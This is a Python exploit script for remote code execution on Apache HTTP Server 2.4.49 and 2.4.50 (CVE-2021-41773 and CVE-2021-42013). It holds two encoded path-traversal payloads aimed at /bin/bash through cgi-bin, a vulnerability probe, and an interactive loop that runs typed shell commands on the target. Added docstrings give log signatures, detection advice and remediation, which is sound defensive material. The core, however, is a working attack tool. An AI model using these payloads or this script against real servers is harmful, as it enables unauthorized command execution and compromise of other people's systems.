  1.  
  2. # Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
  3. # Date: 11/11/2021
  4. # Exploit Author: Valentin Lobstein
  5. # Vendor Homepage: https://apache.org/
  6. # Software Link: https://github.com/Balgogan/CVE-2021-41773
  7. # Version: Apache 2.4.49/2.4.50 (CGI enabled)
  8. # Tested on: Debian GNU/Linux
  9. # CVE : CVE-2021-41773 / CVE-2021-42013
  10. # Credits : Lucas Schnell
  11.  
  12.  
  13. #!/usr/bin/env python3
  14. #coding: utf-8
  15.  
  16. import os
  17. import re
  18. import sys
  19. import time
  20. import requests
  21. from colorama import Fore,Style
  22.  
  23.  
# Start-up banner: an ANSI bold-red escape sequence, an ASCII-art logo, then
# colorama's reset code so later output returns to the default style.
header = '''\033[1;91m

▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
''' + Style.RESET_ALL
  35.  
  36.  
# Usage guard: the target (ip:port) is read from the first command-line
# argument, so stop with a usage line when none was supplied.
if not sys.argv[1:]:
    print( 'Use: python3 file.py ip:port ' )
    sys.exit()
  40.  
def end():
    """Print the farewell line, pause for half a second, then exit with status 1."""
    farewell = "\t\033[1;91m[!] Bye bye !"
    print(farewell)
    time.sleep(0.5)
    sys.exit(1)
  45.  
def commands(url,command,session):
    """Prompt for one command line, POST it to ``url`` and print the reply.

    The ``command`` argument is ignored: it is overwritten by what the
    operator types at the prompt. ``session`` is the requests session used
    for the operator's request; the three prompt look-ups go through
    ``mute_command``, which opens its own session each time.

    Log-analysis note: every prompt costs four POSTs to the same traversal
    path (pwd, whoami, hostname, then the typed command), so interactive use
    of this tool shows up in an access log as bursts of four requests.
    """
    # Fetched on every call, only to draw the user@host: cwd prompt.
    directory = mute_command(url,'pwd')
    user = mute_command(url,'whoami')
    hostname = mute_command(url,'hostname')
    print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
    typed = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
    body = f"echo; {typed};"
    prepared = requests.Request('POST', url=url, data=body).prepare()
    # Put the caller's URL string back after prepare(), so the path is sent
    # exactly as written rather than as requests prepared it.
    prepared.url = url
    print(session.send(prepared, timeout=5).text)
    # Local conveniences; both are substring matches on the whole body.
    if 'clear' in body:
        os.system('/usr/bin/clear')
        print(header)
    if 'exit' in body:
        end()
  64.  
def mute_command(url,command):
    """POST ``echo; <command>`` to ``url`` and return the stripped response text.

    A new ``requests.Session`` is created on every call and nothing is
    printed. The request uses a 5-second timeout.

    Filter-writing note: ``.url`` is overwritten after ``prepare()``, so the
    request carries the path string exactly as the caller built it. Matching
    rules therefore need to look at the raw, still-encoded request path.
    """
    prepared = requests.Request('POST', url=url, data=f"echo; {command}").prepare()
    prepared.url = url
    reply = requests.Session().send(prepared, timeout=5)
    return reply.text.strip()
  72.  
  73.  
def exploitRCE(payload):
    """Probe the host from ``sys.argv[1]`` with one traversal path and, if it answers, offer a command loop.

    The URL is ``host + payload``, prefixed with ``http://`` when the text
    ``http`` does not occur anywhere in ``host``. A single POST with the body
    ``echo; id`` is sent; the target is reported as vulnerable when the
    response text contains ``uid``. On confirmation the function calls
    ``commands`` in an endless loop, which only ends through ``end()`` or
    Ctrl-C.

    Defender notes: the file header names Apache 2.4.49/2.4.50 with CGI
    enabled as the affected configuration. Remediation is upgrading to a
    release later than 2.4.50; keeping ``Require all denied`` on the
    filesystem root and disabling CGI where it is not needed reduce exposure.
    In access logs the probe is a POST whose path starts with ``/cgi-bin/``,
    contains percent-encoded dot segments and ends in ``/bin/bash``.
    """
    # NOTE(review): `s` is never used; the request goes through `session` below.
    s = requests.Session()
    try:
        host = sys.argv[1]
        # Substring test, not a scheme check: any host text containing "http"
        # skips the prefix.
        if 'http' not in host:
            url = 'http://'+ host + payload
        else:
            url = host + payload
        session = requests.Session()
        command = "echo; id"
        req = requests.Request('POST', url=url, data=command)
        prepare = req.prepare()
        # Restore the URL string as built above, so the encoded path is sent as written.
        prepare.url = url
        response = session.send(prepare, timeout=5)
        output = response.text
        # Success test is purely textual: any body containing "uid" counts.
        if "uid" in output:
            # Overwritten by input() two lines below.
            choice = "Y"
            print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
            # "Sortie" is French for "output".
            print("[!] Sortie:\n\n" + Fore.YELLOW + output )
            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
            if choice.lower() in ['','y','yes']:
                # `command` is passed along but commands() replaces it with typed input.
                while True:
                    commands(url,command,session)
            else:
                end()
        else :
            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
    # Only Ctrl-C is handled; connection errors and timeouts from requests propagate.
    except KeyboardInterrupt:
        end()
  103.  
def main():
    """Print the banner, ask which of the two request paths to use, and pass it to ``exploitRCE``.

    Both paths start under ``/cgi-bin/`` and end in ``/bin/bash``; they differ
    only in how the ``..`` segments are encoded. Detection rules need to cover
    both encodings, for example by decoding the request path repeatedly before
    matching, or by matching the two literal forms.
    """
    try:
        # 2.4.49 form (CVE-2021-41773): `%2e` is a percent-encoded '.', so
        # `.%2e` and `%2e%2e` both decode to `..`.
        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
        # 2.4.50 form (CVE-2021-42013): `%%32%65` is `%2e` encoded a second
        # time (`%32` is '2', `%65` is 'e').
        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
        payloads = [apache2449_payload,apache2450_payload]
        # Start out of range so the prompt loop runs at least once.
        choice = len(payloads) + 1
        print(header)
        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
        # NOTE(review): a negative number ends the loop and is then used as a
        # list index; non-numeric input raises ValueError, which is not caught.
        while choice >= len(payloads) and choice >= 0:
            choice = int(input('[~] Choice : '))
            if choice < len(payloads):
                exploitRCE(payloads[choice])
    except KeyboardInterrupt:
        # Same farewell sequence as end(), written out inline.
        print("\n\033[1;91m[!] Bye bye !")
        time.sleep(0.5)
        sys.exit(1)
  120.  
# Run the menu only when the file is executed as a script.
if __name__ == "__main__":
    main()